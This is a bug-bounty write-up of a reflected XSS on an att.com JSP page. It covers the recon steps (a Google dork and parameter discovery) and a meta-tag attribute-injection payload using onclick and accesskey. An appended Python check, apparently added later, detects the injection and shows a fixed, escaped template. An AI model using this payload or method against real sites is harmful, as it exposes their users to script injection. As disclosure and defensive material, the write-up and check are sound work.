Reflected XSS on AT&T

Learn System Security - Reflected XSS on AT&T

I searched with this Google dork:
site:att.com ext:jsp
And I found this URL:
https://www.att.com/esupport/serviceInterstitial.jsp
I started using Arjun to find some unique parameters on that page.
And I found one interesting parameter, because the value of that parameter isn't inside double quotes (") but inside &quot;
Request:
Response:
  • <meta name=&quot;WT.mc_id&quot; content=&quot;test&quot;>
Next, I tried to create a new HTML attribute by adding a space:
Request:
Response:
  • <meta name=&quot;WT.mc_id&quot; content=&quot;test id=x&quot;>

Next step,
Request:
Response:
  • <meta name=&quot;WT.mc_id&quot; content=&quot;x onclick=confirm(document.domain) accesskey=x &quot;>
🔥🔥🔥

#HappyHacking
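
A regression check for the root cause shown in the responses above, added here as an example and not part of the original post: because the attribute delimiters are emitted as `&quot;` instead of real quotes, an HTML parser treats the value as unquoted and a space starts a new attribute. The function names and the `render_broken` template are assumptions reconstructed from the response lines; the input is the `test id=x` value already used above.

```python
from html import escape
from html.parser import HTMLParser


class MetaAttrs(HTMLParser):
    """Records the attributes of the first <meta> tag as an HTML parser sees them."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "meta" and self.attrs is None:
            self.attrs = dict(attrs)


def render_broken(value):
    # Assumed reconstruction of the template behind the responses above:
    # the delimiters are &quot; entities, so no attribute value is quoted.
    return "<meta name=&quot;WT.mc_id&quot; content=&quot;" + value + "&quot;>"


def render_fixed(value):
    # Real quote delimiters, and the reflected value is entity-encoded.
    return '<meta name="WT.mc_id" content="' + escape(value, quote=True) + '">'


def meta_attrs(markup):
    parser = MetaAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def injected_attrs(render, value):
    """Attribute names on the tag other than the two the template intends."""
    return sorted(set(meta_attrs(render(value))) - {"name", "content"})


if __name__ == "__main__":
    probe = "test id=x"  # same benign value as in the second request above
    print("broken:", injected_attrs(render_broken, probe))
    print("fixed: ", injected_attrs(render_fixed, probe))
```

A non-empty result from `injected_attrs` means the reflected value escaped its attribute; the same check can be run against a captured response body by passing the markup to `meta_attrs` directly.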
